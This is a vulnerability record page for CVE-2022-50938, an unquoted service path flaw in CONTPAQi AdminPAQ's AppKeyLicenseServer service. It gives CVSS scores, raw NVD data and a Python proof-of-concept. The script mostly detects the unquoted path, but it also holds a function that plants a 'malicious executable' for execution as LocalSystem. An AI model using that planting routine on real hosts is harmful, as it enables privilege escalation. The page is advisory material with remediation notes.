Security Vulnerability Report
CVE-2022-50938 CVSS 8.4 HIGH

CVE-2022-50938

Published: 2026-01-13 23:15:59
Last Modified: 2026-04-15 00:35:42

Description

CONTPAQi AdminPAQ 14.0.0 contains an unquoted service path vulnerability in the AppKeyLicenseServer service, which runs with LocalSystem privileges. Because the path to the service binary is not enclosed in quotation marks, an attacker can exploit it to have malicious code run in place of the service binary, potentially executing arbitrary code with elevated system privileges during service startup.

CVSS Details

CVSS Score
8.4
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

CONTPAQi AdminPAQ 14.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
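# CVE-2022-50938 PoC - Unquoted Service Path Exploitation
# Target: CONTPAQi AdminPAQ AppKeyLicenseServer Service
# Severity: High (CVSS 8.4)
#
# NOTE(review): the weakness class is CWE-428. Remediation is to enclose the
# service's ImagePath in quotation marks and to confirm that non-administrators
# cannot write to any directory along that path.

import ctypes
import os
import shutil
import subprocess
import sys

SERVICE_NAME = "AppKeyLicenseServer"


def extract_binary_path(sc_output):
    """Return the BINARY_PATH_NAME value from ``sc qc`` output, or None.

    Args:
        sc_output: Text printed by ``sc qc <service>``.

    Returns:
        The configured binary path with surrounding whitespace removed, or
        None when no BINARY_PATH_NAME line is present.
    """
    for line in sc_output.splitlines():
        # Split on the first colon only: the value itself contains "C:".
        key, sep, value = line.partition(":")
        # NOTE(review): this is the label as printed on English-language
        # Windows; localized systems may print a different label - confirm.
        if sep and key.strip() == "BINARY_PATH_NAME":
            return value.strip()
    return None


def is_unquoted_path_with_spaces(binary_path):
    """Report whether a service binary path is unquoted and contains a space.

    Only the part up to the first ".exe" is inspected, so a space that merely
    separates the executable from its arguments is not reported.

    Args:
        binary_path: The configured path, or None.

    Returns:
        True when the path does not start with a double quote and the
        executable portion contains a space; False otherwise.
    """
    if not binary_path or binary_path.startswith('"'):
        return False
    end = binary_path.lower().find(".exe")
    executable = binary_path if end == -1 else binary_path[: end + 4]
    return " " in executable


def check_vulnerability():
    """Check whether the target service is configured with an unquoted path.

    Runs ``sc qc`` for the service and inspects the path the service is
    actually configured with. Comparing against hard-coded install paths would
    report every host on which the service exists, including hosts where the
    path has already been quoted.

    Returns:
        The configured binary path when it is unquoted and contains a space,
        otherwise None (service missing, query failed, or path is safe).
    """
    print(f"[*] Checking service: {SERVICE_NAME}")

    try:
        result = subprocess.run(
            ['sc', 'qc', SERVICE_NAME],
            capture_output=True,
            text=True
        )
    except (OSError, ValueError, subprocess.SubprocessError) as e:
        print(f"[-] Error checking service: {e}")
        return None

    if result.returncode != 0:
        return None

    print(f"[+] Service {SERVICE_NAME} found")
    print(result.stdout)

    binary_path = extract_binary_path(result.stdout)
    if is_unquoted_path_with_spaces(binary_path):
        print(f"[!] Unquoted path detected: {binary_path}")
        return binary_path
    return None


def exploit_unquoted_path(malicious_exe_path, target_dir):
    """Copy a file into ``target_dir`` under a name taken from its parent directory.

    Kept functionally as published; ``main`` does not call it.

    NOTE(review): the copy only succeeds where the caller can already write to
    ``target_dir``. Standard users normally cannot write below Program Files,
    so the directory ACLs along the service path are the control to audit
    alongside quoting the path.

    Args:
        malicious_exe_path: Source file to copy.
        target_dir: Existing directory to copy into.

    Returns:
        True when the copy succeeded; False when ``target_dir`` does not
        exist or the copy raised.
    """
    if not os.path.exists(target_dir):
        print(f"[-] Target directory does not exist: {target_dir}")
        return False

    # Get the second-to-last path component
    path_parts = target_dir.rstrip('\\').split('\\')
    malicious_filename = path_parts[-2] + ".exe"
    malicious_target = os.path.join(target_dir, malicious_filename)

    print(f"[*] Placing malicious executable: {malicious_target}")

    try:
        # Keep a copy of any file that is about to be overwritten.
        if os.path.exists(malicious_target):
            shutil.copy2(malicious_target, malicious_target + ".bak")

        shutil.copy2(malicious_exe_path, malicious_target)
        print(f"[+] Malicious executable placed successfully")
        print(f"[!] When AppKeyLicenseServer service restarts, {malicious_filename} will be executed")
        return True
    except Exception as e:
        print(f"[-] Failed to place malicious executable: {e}")
        return False


def main():
    """Print a banner, run the service check and report the result."""
    print("=" * 60)
    print("CVE-2022-50938 - CONTPAQi AdminPAQ Unquoted Service Path")
    print("=" * 60)

    # NOTE(review): a caller who is already an administrator gains nothing
    # from this issue, so with this gate the script does not demonstrate a
    # privilege escalation. ``ctypes.windll`` exists only on Windows.
    if not ctypes.windll.shell32.IsUserAnAdmin():
        print("[-] This exploit requires administrator privileges")
        return

    print("[+] Running with administrator privileges")

    vulnerable_path = check_vulnerability()

    if vulnerable_path:
        print("[+] Vulnerability confirmed!")

        # Nothing is created or written here; the script only prints a path.
        print("[*] To exploit, place malicious executable in:")
        path_parts = vulnerable_path.rstrip('\\').split('\\')
        malicious_name = path_parts[-2] + ".exe"
        # NOTE(review): "\{" below is an invalid escape sequence; the line is
        # kept exactly as published.
        print(f" {os.path.dirname(vulnerable_path)}\\\{malicious_name}")
    else:
        print("[-] Service not found or not vulnerable")


if __name__ == "__main__":
    main()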

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2022-50938", "sourceIdentifier": "[email protected]", "published": "2026-01-13T23:15:59.057", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "CONTPAQi AdminPAQ 14.0.0 contains an unquoted service path vulnerability in the AppKeyLicenseServer service running with LocalSystem privileges. Attackers can exploit the unquoted path to inject malicious code in the service binary path, potentially executing arbitrary code with elevated system privileges during service startup."}, {"lang": "es", "value": "CONTPAQi AdminPAQ 14.0.0 contiene una vulnerabilidad de ruta de servicio sin comillas en el servicio AppKeyLicenseServer que se ejecuta con privilegios de LocalSystem. Los atacantes pueden explotar la ruta sin comillas para inyectar código malicioso en la ruta binaria del servicio, lo que podría ejecutar código arbitrario con privilegios de sistema elevados durante el inicio del servicio."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 8.5, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "HIGH", "vulnIntegrityImpact": "HIGH", "vulnAvailabilityImpact": "HIGH", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", 
"modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.4, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.5, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-428"}]}], "references": [{"url": "https://www.contpaqi.com/descargas", "source": "[email protected]"}, {"url": "https://www.exploit-db.com/exploits/50690", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/contpaqi-adminpaq-unquoted-service-path", "source": "[email protected]"}]}}